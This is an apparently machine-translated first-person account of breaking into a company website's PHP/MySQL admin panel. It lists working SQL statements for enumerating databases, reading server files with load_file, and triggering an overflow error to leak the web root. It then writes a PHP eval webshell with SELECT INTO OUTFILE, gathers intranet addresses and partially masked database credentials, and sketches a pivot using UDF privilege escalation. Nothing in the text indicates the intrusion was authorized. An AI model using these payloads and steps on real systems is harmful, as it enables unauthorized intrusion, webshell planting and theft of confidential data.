Recording the process of SQL query exploitation is not difficult and tortuous

Author: kkshell
 
Speaking of this day, I read the linux code. I read a lot of materials and even the legendary God book Understanding Linux Kernel. I can't help but understand the English language. I was thinking about whether or not to go out. summer sent a background address and asked me to give him a webshell. This year, I almost never engaged in penetration attacks unless I had a special purpose, I am tired of scanning, cracking, collecting known vulnerabilities, and waiting for a long time. I still feel that I should study programming and linux more and study my favorite technologies. This website was developed by a php program. I had no idea after going in. If I had any idea, I 'd like to talk to summer and ask him to do it.
 
After entering, such:
 
 

 
On the left is the menu, and on the right is the server system information. When I see database management, I thought it was a bit interesting. I looked at the familiar data backup and started to speed it up. I found it was a mysql table backup and confused, php + mysql is certainly not like access, and uploading image backup webshell is a three-step operation. This feeling is not very easy to use, but fortunately there are SQL queries, haha, You know, using the database you can think of something you don't think of, this is much easier than injection, you can even read the configuration file and export a sentence directly. Of course, you must have sufficient permissions.
 
First, query which databases are available. Execute select schema_name from information_schema.SCHEMATA to query the following databases,
 
 
 
Check the tables in the current database and run the following command: select table_name from information_schema.tables where table_shema = 'shaklee 'to obtain the name of the list,
 
 
 
Of course, querying this information is almost useless for shell, but we do not just take shell for intrusion. The most important thing is to learn and be familiar with mysql query statements, consolidate your basic knowledge. As mentioned above, reading the configuration file or homepage PHP file with load_file requires the corresponding file read permission. We will continue to construct the SQL statement query, select @ global. version_compile_ OS from mysql. user and select user () are win32 systems, and database permissions are root permissions, such:
 
 
 
 




 
 
The Root permission is very powerful. If you use it, you can do almost everything. It seems that you can export an example of huima, too. Hahaha! I was so glad to hear that I still don't know the physical path of the website. I was so happy for a long time that I still had nothing to do. In fact, there are two ways to get the physical path: Guess the path and report an error, since I have never guessed it, I can open the website, search for dynamic web links, and add single quotes. For details, see and 1 = 2, and add various error characters, I tried to insert a cross-site statement in the search bar again, but it didn't have any effect. So I took out the scanner and made a manual judgment. I had to wait for half an hour, but it was fruitless. So I asked summer how he got his administrator privilege. When I learned that his password was guessed, I looked up at the sky at 145 degrees and shed tears silently. Website administrators, have you heard of it? What is a weak password? This is a weak password !!! Okay! Even this high school student is bored. It's okay to guess the background password and play basketball.
 
No way, I can only guess, first read boot. ini, the execution statement is as follows: select load_file ('C:/boot. ini ') to get the following result. Remember to use a forward slash here. The backslash will not produce the result,
 
 
 
The system is win2003. I don't know why. I used nmap in bt5 to scan Windows 7 and thought that Windows 7 was used as a server. Maybe it was a firewall or something, next let's try to read the system file, such as the setuplog in windows, system. ini. Although I know this is almost useless, I hope we can't give up. The setuplog read at last is useless information. Find another method. What method, the temptation to grant root database permissions is big, and it is impossible to give up. Read cmd.exe. It's boring. Execute the statement: select load_file ('C:/windows/system/cmd.exe ').
 
 
 
We can see that the Code produced after execution is quite large. My browser is stuck and the fan keeps turning. In this case, I still want to know, what is the effect of a larger data volume? Crash, or ...... If you don't want to say anything, simply add the from sequence code to the back end, is the data size bigger. The complete statement is: select load_file ('C:/windows/system32/cmd.exe ') from information_schema.TABLES. The result is beyond my expectation:
 
 
 
Is overflow, overflow V5, overflow magic, overflow everywhere. Although the above is just an overflow error to get the physical path, it is exactly what we need. It is not a waste of effort. We can know that the physical path is: E: \ YIT \ web \. I guess I can't guess it if I am dead. That boring high school student summer may not be, www.2cto.com. Hurry up and export a sentence, shell is ready. Execute select '<? Php eval ($ _ POST [cmd])?> 'Into outfile' E:/YIT/web/new/shortdes/kk. php' export pony kk. php, such:
 
 
 
However, a warning is prompted during the export process, indicating that the parameter is an invalid result resource. It may be that no echo is displayed, but the export is successful, just in case, export again,
 
 
 
This is an error. The system prompts that the file kkk. php already exists. OK. Now, Let's connect the kitchen knife. I'm excited to connect the kitchen knife,
 
 
 
This clearly shows that c, e, and f can be browsed and executed. Of course, commands such as ver, set, and ipconfig can only be executed. After some tests, the website ip address is 192.168.124.46 and the gateway is 192.168.124.20.
 
Netstat-an learns that the database server is 10.12.1.17, the port is 3306, and the web server's 3389 service is also on,
 


 
Find the configuration file conf. ini in connection according to the web folder and view the following information:
 
DbHost = 10.12.1.17
 
DbUser = root
 
DbPass = d ***** 16999
 
DbName = S ****** e
 
DbPort = 3306
 
Confirmed the test just now. If the company's intranet continues to penetrate, it is also very easy, pr Elevation of Privilege, etc. This has not been tried, and may not work. If it succeeds, port forwarding will be performed again, win 3389 of the web server, connect to the 10.12.1.17 server, root and udf to raise the right, win the database server, and then perform sniffing. This is a conventional idea and the most classic method. I will not repeat it here, there is no difficulty in this penetration. The difficulty is to obtain the physical path. The source code test is still safe, and common SQL and xss are not found (or the level may be limited ), however, one of the most deadly weak passwords has led to the fall of the website, or even the penetration of the Intranet, and the leakage of Company confidential information. These are all serious consequences, what does ant's point mean?
 
Original article by kkshell and QQ: 776336280